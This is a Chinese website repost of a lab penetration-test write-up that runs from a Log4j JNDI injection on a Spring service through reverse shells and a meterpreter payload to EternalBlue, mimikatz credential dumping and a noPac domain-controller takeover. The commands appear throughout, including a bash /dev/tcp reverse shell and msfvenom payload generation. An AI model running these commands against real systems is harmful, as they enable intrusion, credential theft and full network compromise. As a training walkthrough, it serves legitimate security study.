您当前的位置:首页 > 电脑百科 > 安全防护 > 黑客技术

分享一次靶场渗透

时间:2022-04-30 20:00:49  来源:  作者:靓仔的二十四分之一天

外网打点

首先对web进行端口扫描,发现38080端口和22端口

分享一次靶场渗透

 

访问一下38080端口发现是一个error page

分享一次靶场渗透

 

用WAppalyzer看一下是什么架构,但是好像没有检测出来

分享一次靶场渗透

 

拿着报错去百度上发现应该是springboot

分享一次靶场渗透

 

索性用goby再去扫一下,应该是spring没错,但是没有漏洞是什么操作?联想到最近出的log4j2的洞,可能他只是一个日志文件所以并没有框架

分享一次靶场渗透

 


分享一次靶场渗透

 

使用payload=${
jndi:ldap://p9j8l8.DNSlog.cn}验证一下有回显证明存在漏洞

分享一次靶场渗透

 

尝试进一步利用漏洞,首先起一个ldap服务,ip为本地接收shell的ip地址

JAVA -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.105
分享一次靶场渗透

 

抓包修改Content-Type:
appllication/x-www-form-urlencoded,并执行以下payload成功回显

payload=${jndi:ldap://192.168.1.105:1389/TomcatBypass/TomcatEcho}
分享一次靶场渗透

 

执行ls -al /看一下也成功

分享一次靶场渗透

 

nc开启监听端口

分享一次靶场渗透

 

然后使用bash命令反弹,这里需要先base64编码然后对编码后的特殊字符进行2层url转码

bash -i >& /dev/tcp/192.168.1.105/9999 0>&1

抓包添加payload=${
jndi:ldap:1/192.168.199.140:1389/TomcatBypass/Command/Base64/二层转码之后的字符},即可得到反弹shell

分享一次靶场渗透

 

进行信息搜集发现为Docker环境,这里尝试了docker逃逸失败,那么继续进行信息搜集

分享一次靶场渗透

 

在根目录下找到了第一个flag,这里有一个got this,在之前端口扫描的时候看到开放了22端口,尝试使用ssh直接连接

分享一次靶场渗透

 

使用xshell尝试连接

分享一次靶场渗透

 

连接成功,拿到了宿主机的权限

分享一次靶场渗透

 

内网渗透

ifconfig查看网卡情况发现还有一张10.0.1.0/24段的网卡

分享一次靶场渗透

 

这里方便的话其实可以使用cs上线linux后用cs继续打,这里我就没有上线cs,使用linux的命令对10.0.1.0/24段探测存货主机

for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done
分享一次靶场渗透

 

ping一下是存活的

分享一次靶场渗透

 

使用毒液把流量代理出来,首先开启监听

admin.exe -lport 7777
分享一次靶场渗透

 

然后上传agent_linux到靶机上

分享一次靶场渗透

 

加权并执行

chmod 777 agent_linux_x86
agent_linux_x86 -rhost 192.168.1.105 -rport 7777
分享一次靶场渗透

 

连接成功

分享一次靶场渗透

 

这里本来准备用毒液的代理到msf打的,后面觉得比较麻烦,就直接用kali生成的elf马上线msf了

分享一次靶场渗透

 

首先生成一个32位的elf马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
分享一次靶场渗透

 

然后加权并执行

chmod 777 shell.elf

./shell
分享一次靶场渗透

 

kali使用exploit/multi/handler进行监听

分享一次靶场渗透

 

获取到宿主机的shell

分享一次靶场渗透

 

然后添加10.0.1.0/24段的路由

bg

route add 10.0.1.0 255.255.255.0 1
route print
分享一次靶场渗透

 

然后配置proxychAIn4.conf文件并使用socks模块

search socks
use auxiliary/sevrer/socks_proxy
run
分享一次靶场渗透

 

我们在之前已经知道了内网主机的ip,那么这里我们直接使用proxychain配合nmap对10.0.1.7的端口进行扫描

proxychains4 nmap -sT -Pn 10.0.1.7
分享一次靶场渗透

 

发现有445端口,那么对445端口进一步扫描

分享一次靶场渗透

 

先确定一下系统版本,使用
auxiliary/scanner/smb/smb_version模块,发现是win7 sp1

分享一次靶场渗透

 

看能不能利用永恒之蓝,这里使用到
auxiliary/scanner/smb/smb_ms17_010模块,发现可以利用永恒之蓝

分享一次靶场渗透

 

使用
exploit/windows/smb/ms17_010_eternalbule模块,因为是不出网环境,这里需要用到bind_tcp载荷

分享一次靶场渗透

 

run之后拿到一个system权限的meterpreter

分享一次靶场渗透

 

在C:UsersrootDesktop下拿到第二个flag

分享一次靶场渗透

 

然后继续进行信息搜集,发现同样是双网卡,还存在10.0.0.0/24段的一张网卡

分享一次靶场渗透

 

ipconfig /all看到dns服务器为redteam.lab应该在域内

分享一次靶场渗透

 

这里ping一下redteam.lab得到域控的ip为10.0.0.12

分享一次靶场渗透

 

这里不知道域控有什么洞,先上传一个mimikatz把密码抓取出来,得到Administrator/Admin12345,这里其实就可以使用域管账户ipc直接连接,但是这里抓到了一个域用户,尝试使用最新的CVE-2021-42287、CVE-2021-42278来进行攻击,关于漏洞的原理请移步

privilege::debug
sekurlsa::logonpasswords
分享一次靶场渗透

 


分享一次靶场渗透

 

这里我准备使用noPac.exe直接去获取一个shell的,但是这里noPac.exe的利用条件是需要主机上有.NET4.0环境,所以这里没有回显

noPac.exe下载地址:
https://Github.com/cube0x0/noPac

分享一次靶场渗透

 

本来准备一步一步的用原始的方法打的,但是powershell用不了没有回显,就写一下原始利用的步骤吧

首先创建一个机器账户,可以使用 impacket 的 addcomputer.py或是powermadaddcomputer.py是利用SAMR协议创建机器账户,这个方法所创建的机器账户没有SPN,所以可以不用清除

清除机器账户的servicePrincipalName属性

将机器账户的sAmaccountName,更改为DC的机器账户名字,注意后缀不带$

为机器账户请求TGT

将机器账户的sAMAccountName更改为其他名字,不与步骤3重复即可

通过S4U2self协议向DC请求ST

进行 DCsync Attack

分享一次靶场渗透

 

这里直接使用sam_the_admin.py进行攻击

proxychains Python/ target=_blank class=infotextkey>Python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell
分享一次靶场渗透

 

即可拿到DC的shell

分享一次靶场渗透

 

在C:UsersAdministratorDesktop下找到最后一个flag

分享一次靶场渗透

 



Tags:靶场渗透   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除。
▌相关推荐
记一次内网靶场渗透测试
前言最近在做内网渗透相关姿势点的总结,打了一些靶场,本次内网网络拓扑图如下所示,中等进阶难度。 测试过程0x1:信息搜集访问域名: 对域名解析的ip进行端口扫描:nmap -sS --open -...【详细内容】
2022-06-15  Search: 靶场渗透  点击:(469)  评论:(0)  加入收藏
分享一次靶场渗透
外网打点首先对web进行端口扫描,发现38080端口和22端口 访问一下38080端口发现是一个error page 用Wappalyzer看一下是什么架构,但是好像没有检测出来 拿着报错去百度上发现应...【详细内容】
2022-04-30  Search: 靶场渗透  点击:(400)  评论:(0)  加入收藏
▌简易百科推荐
小心“黑客”利用445端口攻击你的Win8系统!
Windows 8系统自带一个名为SMB(Server Message Block)的服务,使用445端口进行通信。这个服务主要用于文件共享和网络协议等功能,但是无良黑客也会利用这个服务来攻击你的电脑。...【详细内容】
2024-04-10    潘小姐  Tags:445端口   点击:(9)  评论:(0)  加入收藏
为什么黑客不去攻击微信钱包?
在这个数字化时代,网络安全已经成为我们生活中不可或缺的一部分。每当我们打开手机,使用微信钱包进行支付时,是否曾有过这样的疑问:为什么黑客不去攻击微信钱包?这个问题,就像是在...【详细内容】
2024-02-19  猫探长情报局  今日头条  Tags:黑客   点击:(56)  评论:(0)  加入收藏
发条消息就能破解iPhone?苹果系统这次像被“内鬼”攻破的。。。
前几天,差评君在网上冲浪的时候,看到了一条相当震撼的消息:简单来讲,就是主打封闭安全的 iPhone ,不仅被攻击者发现了漏洞成功入侵,完全控制整个手机。更加抽象的是入侵的还是知名...【详细内容】
2024-01-26  差评    Tags:破解iPhone   点击:(142)  评论:(0)  加入收藏
十种黑客攻击手段及防御方法
在互联网的世界里,网站安全犹如一座城堡,需要严密的防线来抵御各种攻击手段。以下是10种最常见的网络攻击手段,以及我们如何采取措施来保护我们的网站。1. 跨站脚本攻击:这是黑...【详细内容】
2024-01-21  老吴讲IT    Tags:黑客攻击   点击:(87)  评论:(0)  加入收藏
渗透测试中最常见的漏洞有哪些?
什么是渗透测试?渗透测试是一项安全测试,旨在模拟黑客的攻击方式,评估系统、网络或应用程序的安全性,发现潜在的安全漏洞并提出建议来修复它们。渗透测试中最常见的漏洞包括:1....【详细内容】
2024-01-11  五湖联技术服务公司    Tags:渗透测试   点击:(110)  评论:(0)  加入收藏
作为一名黑客/安全专家,应该掌握什么技能?熟悉哪些软件/工具?
作为一名合格的黑客/网络安全专家,应该具备一套全面的知识体系和实战技能,同时熟悉多种安全软件和工具。今天我们将根据目前市面上流行的一些应用程序,以及常规的安全防护措施,...【详细内容】
2023-12-11  黑客联盟I    Tags:黑客   点击:(144)  评论:(0)  加入收藏
黑客是如何入侵一个网站的?(网络安全人员应该了解的知识)
前不久阿里以及滴滴系统的大规模瘫痪足以唤起人们对网络安全的重视。我首先必须澄清的是,作为一个网络安全专家,我不提供或者鼓励任何违法的行为,包括未经授权的计算机系统入侵...【详细内容】
2023-12-07  黑客联盟I    Tags:黑客   点击:(179)  评论:(0)  加入收藏
网络黑客入侵解析:保护你的网络安全
在当今数字化快速发展的时代,网络安全问题逐渐成为人们关注的焦点。网络黑客入侵事件频发,给个人和企业带来了严重的威胁。本文将深入解析网络黑客入侵的常见手段和原因,并探讨...【详细内容】
2023-12-05  小记青春    Tags:黑客入侵   点击:(164)  评论:(0)  加入收藏
黑客滥用 Google 表单进行诈骗
研究人员最近发现滥用 Google 表单的垃圾邮件有所增加,攻击者首先在 Google 表单中创建新的问卷调查,并且利用受害者的电子邮件地址参与问卷调查,滥用 Google 表单的功能将垃圾...【详细内容】
2023-11-23  区块软件开发  今日头条  Tags:黑客   点击:(227)  评论:(0)  加入收藏
黑客工具 Flipper Zero 曝光,可利用蓝牙弹出窗口崩溃 iPhone
据外媒 9to5Mac 报道,一种流行且廉价的黑客设备 Flipper Zero 今年 9 月首次出现,可通过制造蓝牙弹出窗口,向 iPhone 和 iPad 重复告诉发送垃圾内容,直到相关设备最终崩溃,不过直...【详细内容】
2023-11-20  IT之家    Tags:黑客工具   点击:(242)  评论:(0)  加入收藏
相关文章
    无相关信息
站内最新
站内热门
站内头条